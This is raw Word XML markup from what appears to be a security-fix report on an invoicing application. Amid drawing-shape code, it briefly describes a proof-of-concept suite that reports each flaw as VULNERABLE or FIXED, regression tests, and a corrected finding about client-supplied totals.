      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/run-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>all.mjs</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 suite of scripts that perform each attack against a running instance and report </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VULNERABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FIXED.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the core of our evidence, because it removes the ambiguity in "we think we fixed it". It is a single command with a pass/fail exit code, so it also serves as the demonstration in the video.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29AC5A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="323"/>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7696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A859172" wp14:editId="41296C99">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5437882</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18973</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="723900" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25692" name="Group 25692"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="723900" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="723900" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="351" name="Shape 351"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="723900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="723900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="723900" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="723900" y="142875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142873"/>
                                  <a:pt x="4649" y="141943"/>
                                  <a:pt x="2789" y="140083"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2789" y="2789"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="4649" y="929"/>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692" style="width:57pt;height:11.25pt;position:absolute;z-index:-2147483641;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:428.18pt;mso-position-vertical-relative:text;margin-top:-1.494pt;" coordsize="7239,1428">
                <v:shape id="Shape 351" style="position:absolute;width:7239;height:1428;left:0;top:0;" coordsize="723900,142875" path="m9525,0l723900,0l723900,142875l9525,142875c6894,142873,4649,141943,2789,140083l0,133351l0,9524l2789,2789c4649,929,6894,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8720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D380D89" wp14:editId="1A6C2673">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152476</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="609600" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25693" name="Group 25693"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="609600" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="609600" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="353" name="Shape 353"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="609600" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="609600" h="142875">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="600075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="602705" y="0"/>
                                  <a:pt x="604950" y="930"/>
                                  <a:pt x="606810" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="608670" y="4649"/>
                                  <a:pt x="609600" y="6894"/>
                                  <a:pt x="609600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="609600" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="609600" y="135979"/>
                                  <a:pt x="608670" y="138224"/>
                                  <a:pt x="606810" y="140083"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="604950" y="141943"/>
                                  <a:pt x="602705" y="142873"/>
                                  <a:pt x="600075" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="142875"/>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693" style="width:48pt;height:11.25pt;position:absolute;z-index:-2147483639;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:12.006pt;" coordsize="6096,1428">
                <v:shape id="Shape 353" style="position:absolute;width:6096;height:1428;left:0;top:0;" coordsize="609600,142875" path="m0,0l600075,0c602705,0,604950,930,606810,2789c608670,4649,609600,6894,609600,9525l609600,133350c609600,135979,608670,138224,606810,140083c604950,141943,602705,142873,600075,142875l0,142875l0,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Regression testing.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 90 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PHPUnit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tests (230 assertions) plus 19 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vitest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tests, each written to fail against </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v0-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>originalvulnerable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and pass afterwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5E471" w14:textId="77777777"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3.1 A note on verifying rather than assuming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD9A4AF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="185"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Three times during this work the evidence contradicted the initial reading, and each correction improved the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F9B0E" w14:textId="6A64C3B0"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79744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="420BCFFC" wp14:editId="5A36D7F4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2989956</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-13094</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3228975" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25694" name="Group 25694"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3228975" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3228975" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="359" name="Shape 359"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="771525" y="0"/>
                            <a:ext cx="409575" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="409575" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="402681" y="0"/>
                                  <a:pt x="404926" y="930"/>
                                  <a:pt x="406786" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="408646" y="4648"/>
                                  <a:pt x="409575" y="6894"/>
                                  <a:pt x="409575" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="409575" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="409575" y="126454"/>
                                  <a:pt x="408646" y="128699"/>
                                  <a:pt x="406786" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="404926" y="132417"/>
                                  <a:pt x="402681" y="133347"/>
                                  <a:pt x="400050" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>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63" name="Shape 363"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1781175" y="0"/>
                            <a:ext cx="1447800" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1447800" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1438275" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1440905" y="0"/>
                                  <a:pt x="1443150" y="930"/>
                                  <a:pt x="1445010" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1446869" y="4648"/>
                                  <a:pt x="1447800" y="6894"/>
                                  <a:pt x="1447800" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1447800" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1447800" y="126454"/>
                                  <a:pt x="1446869" y="128699"/>
                                  <a:pt x="1445010" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1443150" y="132417"/>
                                  <a:pt x="1440905" y="133347"/>
                                  <a:pt x="1438275" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>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68" name="Shape 368"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="409575" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="409575" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="402680" y="0"/>
                                  <a:pt x="404926" y="930"/>
                                  <a:pt x="406785" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="408645" y="4648"/>
                                  <a:pt x="409575" y="6894"/>
                                  <a:pt x="409575" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="409575" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="409575" y="126454"/>
                                  <a:pt x="408645" y="128699"/>
                                  <a:pt x="406785" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="404926" y="132417"/>
                                  <a:pt x="402680" y="133347"/>
                                  <a:pt x="400050" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>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73" name="Shape 373"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1200150" y="171450"/>
                            <a:ext cx="400050" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="400050" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="390525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="393155" y="0"/>
                                  <a:pt x="395400" y="930"/>
                                  <a:pt x="397261" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399120" y="4648"/>
                                  <a:pt x="400050" y="6894"/>
                                  <a:pt x="400050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="400050" y="126454"/>
                                  <a:pt x="399120" y="128699"/>
                                  <a:pt x="397261" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="395400" y="132417"/>
                                  <a:pt x="393155" y="133347"/>
                                  <a:pt x="390525" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>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376" name="Shape 376"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2466975" y="171450"/>
                            <a:ext cx="285751" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285751" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276226" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278856" y="0"/>
                                  <a:pt x="281101" y="930"/>
                                  <a:pt x="282961" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284821" y="4648"/>
                                  <a:pt x="285751" y="6894"/>
                                  <a:pt x="285751" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285751" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285751" y="126454"/>
                                  <a:pt x="284821" y="128699"/>
                                  <a:pt x="282961" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281101" y="132417"/>
                                  <a:pt x="278856" y="133347"/>
                                  <a:pt x="276226" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4648"/>
                                  <a:pt x="2790" y="2787"/>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5694" style="width:254.25pt;height:24pt;position:absolute;z-index:-2147483624;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:235.43pt;mso-position-vertical-relative:text;margin-top:-1.03108pt;" coordsize="32289,3048">
                <v:shape id="Shape 359" style="position:absolute;width:4095;height:1333;left:7715;top:0;" coordsize="409575,133350" path="m9525,0l400050,0c402681,0,404926,930,406786,2787c408646,4648,409575,6894,409575,9525l409575,123825c409575,126454,408646,128699,406786,130556c404926,132417,402681,133347,400050,133350l9525,133350c6895,133347,4650,132417,2790,130556c930,128699,0,126454,0,123825l0,9525c0,6894,930,4648,2790,2787c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 363" style="position:absolute;width:14478;height:1333;left:17811;top:0;" coordsize="1447800,133350" path="m9525,0l1438275,0c1440905,0,1443150,930,1445010,2787c1446869,4648,1447800,6894,1447800,9525l1447800,123825c1447800,126454,1446869,128699,1445010,130556c1443150,132417,1440905,133347,1438275,133350l9525,133350c6895,133347,4650,132417,2790,130556c930,128699,0,126454,0,123825l0,9525c0,6894,930,4648,2790,2787c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 368" style="position:absolute;width:4095;height:1333;left:0;top:1714;" coordsize="409575,133350" path="m9525,0l400050,0c402680,0,404926,930,406785,2787c408645,4648,409575,6894,409575,9525l409575,123825c409575,126454,408645,128699,406785,130559c404926,132417,402680,133347,400050,133350l9525,133350c6895,133347,4650,132417,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6894,930,4648,2790,2787c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 373" style="position:absolute;width:4000;height:1333;left:12001;top:1714;" coordsize="400050,133350" path="m9525,0l390525,0c393155,0,395400,930,397261,2787c399120,4648,400050,6894,400050,9525l400050,123825c400050,126454,399120,128699,397261,130559c395400,132417,393155,133347,390525,133350l9525,133350c6895,133347,4650,132417,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6894,930,4648,2790,2787c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 376" style="position:absolute;width:2857;height:1333;left:24669;top:1714;" coordsize="285751,133350" path="m9526,0l276226,0c278856,0,281101,930,282961,2787c284821,4648,285751,6894,285751,9525l285751,123825c285751,126454,284821,128699,282961,130559c281101,132417,278856,133347,276226,133350l9526,133350c6895,133347,4650,132417,2790,130559c930,128699,0,126454,1,123825l1,9525c0,6894,930,4648,2790,2787c4650,930,6895,0,9526,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 xml:space="preserve">We initially recorded V-10 as "client-supplied totals and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spoofable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inv_by</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InvoiceController</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 xml:space="preserve">store </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">properly showed the server </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
